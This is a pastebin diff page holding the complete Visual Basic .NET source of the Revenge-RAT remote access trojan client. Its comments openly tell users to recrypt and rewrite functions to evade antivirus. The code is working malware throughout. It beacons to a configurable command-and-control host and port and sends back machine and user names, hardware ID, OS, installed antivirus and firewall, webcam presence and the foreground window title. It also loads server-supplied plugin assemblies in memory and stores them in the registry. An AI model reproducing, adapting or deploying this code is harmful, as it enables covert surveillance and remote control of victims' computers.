View difference between Paste ID: <a href="/Y4k6TdAh">Y4k6TdAh</a> and <a href="/eLZFmeu0">eLZFmeu0</a>

' Fixed By NYAN CAT \\ NOV 25TH, 2018
1		' Fixed By NYAN CAT \\ NOV 25TH, 2018
2
3		' Revenge-RAT Client Source Code v0.3
4		' By N A P O L E O N
5		' You can update/Crypt the client again, learn if you want , some codes typed direct for beginners
6		' if you want good result in runtime vs AV, rewrite some functions much as you can
7		' Last edit: 2016/12/9
8		Imports System.Management, Microsoft.VisualBasic.Devices, System.Collections.Generic, System.Diagnostics, System.Windows.Forms, System.Globalization, System.IO.Compression, System.Net, System.Threading, Microsoft.Win32, System.Text, System.IO
9
10		Public Class Atomic
11		Public OW As Boolean = False
12		Public C As Object = Nothing
13		Public Cn As Boolean = False
14		Public SC = New Thread(AddressOf MAC, 1)
15		Public PT As New Thread(AddressOf Pin)
16		Public I As Integer = 1
17		Public MS As Integer = 0
18
19		'########################################################
20		Public Hosts As String() = Split("127.0.0.1,", ",") 'Your IP
21		Public Ports As String() = Split("333,", ",") 'Your Port
22		Public Shared Key As String = "Revenge-RAT" 'Your Key
23		'########################################################
24
25		Public ID As String = "TllBTi1DQVQ="
26		Public MUTEX As String = "RV_MUTEX-FZMONFueOciq"
27		Public H As Integer = 0
28		Public P As Integer = 0
29		Public Shared SPL As String = "-]NK[-"
30		Public Shared App As String = Application.ExecutablePath
31		Public Shared SCG As New Atomic
32		Public Shared DI As ComputerInfo = New ComputerInfo
33		Public Shared MT As Mutex
34		Public Shared Tick As System.Threading.Timer = Nothing
35
36
37		Shared Sub Main()
38		SCG.Execute()
39		End Sub
40
41		Sub Execute()
42		Try : MT = New Mutex(True, MUTEX, OW) : If Not OW Then End : AddHandler Application.ApplicationExit, Sub() MT.ReleaseMutex()
43		Catch : End Try
44		SC.Start() : PT.Start()
45		End Sub
46
47		Sub Pin()
48		RE: If I = 0 Then : MS += 1 : End If : Thread.Sleep(1) : GoTo RE
49		End Sub
50
51		Sub data(ByVal b As Byte()) ' receive commands from RV-RAT
52		Dim Rev As String() = Split(BS(b), Key)
53		If Rev(0) = "PNC" Then
54		I = 0
55		Send("PNC")
56		ElseIf Rev(0) = "P" Then
57		I = 1
58		Send("P" & Key & MS)
59		MS = 0
60		Send("W" & Key & GAW())
61		ElseIf Rev(0) = "IE" Then ' Ask about plugin
62		If Not Registry.CurrentUser.OpenSubKey("Software\" & Encode(MUTEX) & "\" & Rev(1), True) Is Nothing Then : Try : INV(Hosts(H), Ports(P), Rev(4), Rev(5), Encode(Decode(ID) & "_" & HWD()), Registry.GetValue("HKEY_CURRENT_USER\SOFTWARE\" & Encode(MUTEX) & "\" & Rev(1), Rev(1), Nothing).ToString, Rev(2), Rev(3), Rev(1), True) : Catch : Send("GPL" & Key & Rev(5) & Key & Rev(1) & Key & False) : End Try : Else : Send("GPL" & Key & Rev(5) & Key & Rev(1) & Key & False) : End If
63		ElseIf Rev(0) = "LP" Then ' invoke plugin
64		INV(Hosts(H), Ports(P), Rev(1), Rev(2), Encode(Decode(ID) & "_" & HWD()), Rev(3), Rev(4), Rev(5), Rev(6), Rev(7))
65		ElseIf Rev(0) = "UNV" Then ' uninstall - restart - close .. etc
66		LA(Rev(1)).CreateInstance(Rev(2)).UNI(Encode(MUTEX), Rev(3), Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Rev(4), Rev(5), App, Rev(6), Rev(7), Rev(8), Rev(9), Rev(10), Rev(11), Rev(12), Rev(13))
67		End If
68		End Sub
69
70		Public Function INV(ByVal H As String, P As String, N As String, C As String, ID As String, Bytes As String, S As Integer, M As Boolean, MD5 As String, B As Boolean) ' invoke plugin
71		LA(Bytes).CreateInstance(N & "." & C, True).Start(ID, S, H, P, Key, SPL) : If M Then : Try : If Registry.CurrentUser.OpenSubKey("Software\" & Encode(MUTEX) & "\" & MD5, True) Is Nothing Then : IR("HKEY_CURRENT_USER\SOFTWARE\" & Encode(MUTEX) & "\" & MD5, MD5, Bytes) : End If : Catch : End Try : If B = False Then : IR("HKEY_CURRENT_USER\SOFTWARE\" & Encode(MUTEX) & "\" & MD5, MD5, Bytes) : End If : End If
72		End Function
73
74		Public Function LA(B As String) ' load assembly
75		Return Reflection.Assembly.Load(Decompress(Convert.FromBase64String(B)))
76		End Function
77
78		Public Function IR(ByVal P As String, N As String, B As String) ' add reg value
79		Try : Registry.SetValue(P, N, B) : Catch : End Try
80		End Function
81
82		Sub MAC()
83
84		Dim M As Object = New MemoryStream
85		Dim lp As Integer = 0
86		re:
87		Try : Try : EmptyWorkingSet(Process.GetCurrentProcess.Handle) : Catch : End Try : Catch : End Try
88		Try
89		If C Is Nothing Then GoTo e
90		If C.Client.Connected = False Then GoTo e
91		If Cn = False Then GoTo e
92		lp += 1
93		If lp > 300 Then
94		lp = 0
95		If C.Client.Poll(-1, Sockets.SelectMode.SelectRead) And C.Client.Available <= 0 Then GoTo e
96		End If
97		If C.Available > 0 Then
98		Dim B(C.Available - 1) As Byte
99		C.Client.Receive(B, 0, B.Length, Sockets.SocketFlags.None)
100		M.Write(B, 0, B.Length)
101		rr:
102		If BS(M.ToArray).Contains(SPL) Then
103		Dim A As Array = fx(M.ToArray, SPL)
104		Dim T As New Thread(AddressOf data)
105		T.Start(A(0))
106		M.Dispose()
107		M = New IO.MemoryStream
108		If A.Length = 2 Then
109		M.Write(A(1), 0, A(1).length)
110		GoTo rr
111		End If
112		End If
113		End If
114		Catch
115		GoTo e
116		End Try
117		Thread.CurrentThread.Sleep(1)
118		GoTo re
119		e:
120		Try : Try : EmptyWorkingSet(Process.GetCurrentProcess.Handle) : Catch : End Try : Catch : End Try
121		Cn = False
122		Try
123		C.Client.Disconnect(False)
124		Catch
125		End Try
126		Try
127		M.Dispose()
128		Catch
129		End Try
130		Try
131		Tick.Dispose()
132		Catch
133		End Try
134		M = New MemoryStream
135		Dim IC As Boolean = False
136		For Count As Integer = 0 To Hosts.Length - 2
137		Try
138		C = New Sockets.TcpClient() With {.ReceiveTimeout = -1, .SendTimeout = -1, .SendBufferSize = 999999, .ReceiveBufferSize = 999999}
139		lp = 0
140		CK().Connect(Hosts(Count), Ports(Count))
141		Cn = True
142
143		Send("Information" & Key & ID & Key & Encode("_" & HWD()) & Key & IP() & Key & Encode(Environment.MachineName & " / " & Environment.UserName) & Key & CIVC() & Key & Encode(DI.OSFullName & " " & OP()) & Key & Encode(MP()) & Key & DI.TotalPhysicalMemory & Key & GetProduct("Select * from AntiVirusProduct") & Key & GetProduct("SELECT * FROM FirewallProduct") & Key & Ports(P) & Key & GAW() & Key & Encode(CultureInfo.CurrentCulture.Name) & Key & "False") ' RVUS for make this client special color in lv , true for spread , RVUS for you , and false mean this client didn't come from spread
144		H = Count
145		P = Count
146		IC = True
147		Dim T As New TimerCallback(AddressOf Ping)
148		Tick = New Threading.Timer(T, Nothing, 10000, 30000)
149		GoTo re
150		Catch
151		Thread.Sleep(5000) ' replace it for reconnect time in ms , like 2500 or 5000
152		H = 0
153		P = 0
154		End Try
155		Next
156		If IC = True Then
157		IC = False
158		GoTo e
159		End If
160		GoTo re
161		End Sub
162
163		Sub Ping()
164		Send("alive??")
165		End Sub
166
167		Function CK()
168		Return C.Client
169		End Function
170
171		Public Sub Send(ByVal b As Byte())
172		If Cn = False Then Exit Sub
173		Try
174		Dim r As Object = New MemoryStream
175		r.Write(b, 0, b.Length)
176		r.Write(SB(SPL), 0, SPL.Length)
177		C.Client.SendBufferSize = b.Length
178		C.Client.Poll(-1, Net.Sockets.SelectMode.SelectWrite)
179		C.Client.Send(r.ToArray, 0, r.Length, Sockets.SocketFlags.None)
180		r.Dispose()
181		Catch
182		Cn = False
183		End Try
184		End Sub
185
186		Public Sub Send(ByVal S As String)
187		Send(SB(S))
188		End Sub
189
190		Public Function IP()
191		Try : Return CType(Dns.GetHostByName(Dns.GetHostName()).AddressList.GetValue(0), IPAddress).ToString() : Catch : Return "????" : End Try
192		End Function
193
194		Private Declare Function GVI Lib "kernel32" Alias "GetVolumeInformationA" (ByVal IP As String, ByVal V As String, ByVal T As Integer, ByRef H As Integer, ByRef Q As Integer, ByRef G As Integer, ByVal J As String, ByVal X As Integer) As Integer : Private Declare Function GFW Lib "user32" Alias "GetForegroundWindow" () As IntPtr : Private Declare Auto Function GetWindowText Lib "user32" (ByVal hWnd As IntPtr, ByVal lpString As StringBuilder, ByVal cch As Integer) As Integer : Declare Function capGetDriverDescriptionA Lib "avicap32.dll" (ByVal wDriver As Short, ByVal lpszName As String, ByVal cbName As Integer, ByVal lpszVer As String, ByVal cbVer As Integer) As Boolean
195		<Runtime.InteropServices.DllImport("psapi")>
196		Public Shared Function EmptyWorkingSet(ByVal hProcess As Long) As Boolean
197		End Function
198
199		Public Function HWD() As String
200		Try : Dim HSN As Integer : GVI(Environ("SystemDrive") & "\", Nothing, Nothing, HSN, 0, 0, Nothing, Nothing) : Return Hex(HSN) : Catch : Return "ERR" : End Try
201		End Function
202
203		Public Function CIVC() As String
204		Try : For i As Integer = 0 To 4 : If capGetDriverDescriptionA(i, Space(100), 100, Nothing, 100) Then : Return "Yes" : End If : Next : Catch : End Try : Return "No"
205		End Function
206
207		Public Shared Function OP() As String
208		Try : For Each SC As ManagementObject In New ManagementObjectSearcher("select * from Win32_Processor").[Get]() : Return Convert.ToInt32(SC("AddressWidth")) : Next : Catch : Return "????" : End Try
209		End Function
210
211		Public Function GetProduct(ByVal Product As String) As String
212		Try : Dim PN As String = String.Empty : For Each AV As ManagementObject In New ManagementObjectSearcher("root\SecurityCenter" & IIf(DI.OSFullName.Contains("XP"), "", "2").ToString, Product).Get : PN &= AV("displayName").ToString : Next : If Not PN = String.Empty Then : Return Encode(PN) : Else : Return Encode("N/A") : End If : Catch : Return Encode("N/A") : End Try
213		End Function
214
215		Public Function MP()
216		Try : Return Registry.GetValue("HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0", "ProcessorNameString", Nothing).ToString : Catch : Return "????" : End Try
217		End Function
218
219		Public Function GAW() As String
220		Dim W As New StringBuilder(256) : GetWindowText(GFW(), W, W.Capacity) : Return Encode(W.ToString())
221		End Function
222
223		Function SB(ByVal s As String) As Byte()
224		Return Encoding.Default.GetBytes(s)
225		End Function
226
227		Function BS(ByVal b As Byte()) As String
228		Return Encoding.Default.GetString(b)
229		End Function
230
231		Function fx(ByVal b As Byte(), ByVal WRD As String) As Array
232		Dim a As New List(Of Byte()), M As New MemoryStream, MM As New MemoryStream, T As String() = Split(BS(b), WRD) : M.Write(b, 0, T(0).Length) : MM.Write(b, T(0).Length + WRD.Length, b.Length - (T(0).Length + WRD.Length)) : a.Add(M.ToArray) : a.Add(MM.ToArray) : M.Dispose() : MM.Dispose() : Return a.ToArray
233		End Function
234
235		Public Function Decompress(data As Byte()) As Byte()
236		Dim input As New MemoryStream() : input.Write(data, 0, data.Length) : input.Position = 0
237		Dim gzip As New GZipStream(input, CompressionMode.Decompress, True), output As New MemoryStream(), buff As Byte() = New Byte(63) {}, read As Integer = -1
238		read = gzip.Read(buff, 0, buff.Length) : While read > 0 : output.Write(buff, 0, read) : read = gzip.Read(buff, 0, buff.Length) : End While : gzip.Close() : Return output.ToArray()
239		End Function
240
241		Public Function Encode(ByVal Input As String)
242		Return Convert.ToBase64String(Encoding.UTF8.GetBytes(Input))
243		End Function
244
245		Public Function Decode(ByVal Input As String)
246		Return Encoding.UTF8.GetString(Convert.FromBase64String(Input))
247		End Function
248
249		End Class